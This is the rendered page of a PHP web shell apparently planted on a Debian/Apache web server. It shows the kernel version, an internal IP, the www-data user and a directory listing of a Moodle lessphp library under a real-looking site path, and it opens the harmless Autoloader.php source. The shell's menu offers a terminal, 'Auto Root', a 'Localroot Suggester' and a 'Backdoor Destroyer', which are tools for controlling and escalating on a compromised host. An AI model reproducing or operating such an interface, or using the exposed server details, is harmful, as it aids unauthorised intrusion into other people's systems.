Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
sipdm.cesa.co.za /
lib /
lessphp /
Delete
Unzip
Name
Size
Permission
Date
Action
Exception
[ DIR ]
drwxr-sr-x
2017-06-22 15:46
Output
[ DIR ]
drwxr-sr-x
2017-06-22 15:46
SourceMap
[ DIR ]
drwxr-sr-x
2017-06-22 15:46
Tree
[ DIR ]
drwxr-sr-x
2017-06-22 15:46
Visitor
[ DIR ]
drwxr-sr-x
2017-06-22 15:46
Autoloader.php
1.42
KB
-rw-r--r--
2017-06-22 15:46
Cache.php
7.76
KB
-rw-r--r--
2017-06-22 15:46
Colors.php
4.17
KB
-rw-r--r--
2017-06-22 15:46
Configurable.php
1.19
KB
-rw-r--r--
2017-06-22 15:46
Environment.php
3.29
KB
-rw-r--r--
2017-06-22 15:46
Functions.php
36.9
KB
-rw-r--r--
2017-06-22 15:46
LICENSE
9.5
KB
-rw-r--r--
2017-06-22 15:46
Less.php.combine
226
B
-rw-r--r--
2017-06-22 15:46
Mime.php
1007
B
-rw-r--r--
2017-06-22 15:46
Output.php
749
B
-rw-r--r--
2017-06-22 15:46
Parser.php
59.76
KB
-rw-r--r--
2017-06-22 15:46
Tree.php
1.6
KB
-rw-r--r--
2017-06-22 15:46
Version.php
328
B
-rw-r--r--
2017-06-22 15:46
Visitor.php
850
B
-rw-r--r--
2017-06-22 15:46
VisitorReplacing.php
1.19
KB
-rw-r--r--
2017-06-22 15:46
moodle_readme.txt
333
B
-rw-r--r--
2017-06-22 15:46
Save
Rename
<?php /** * Autoloader * * @package Less * @subpackage autoload */ class Less_Autoloader { /** * Registered flag * * @var boolean */ protected static $registered = false; /** * Library directory * * @var string */ protected static $libDir; /** * Register the autoloader in the spl autoloader * * @return void * @throws Exception If there was an error in registration */ public static function register(){ if( self::$registered ){ return; } self::$libDir = dirname(__FILE__); if(false === spl_autoload_register(array('Less_Autoloader', 'loadClass'))){ throw new Exception('Unable to register Less_Autoloader::loadClass as an autoloading method.'); } self::$registered = true; } /** * Unregisters the autoloader * * @return void */ public static function unregister(){ spl_autoload_unregister(array('Less_Autoloader', 'loadClass')); self::$registered = false; } /** * Loads the class * * @param string $className The class to load */ public static function loadClass($className){ // handle only package classes if(strpos($className, 'Less_') !== 0){ return; } $className = substr($className,5); $fileName = self::$libDir . DIRECTORY_SEPARATOR . str_replace('_', DIRECTORY_SEPARATOR, $className) . '.php'; if(file_exists($fileName)){ require $fileName; return true; }else{ throw new Exception('file not loadable '.$fileName); } } }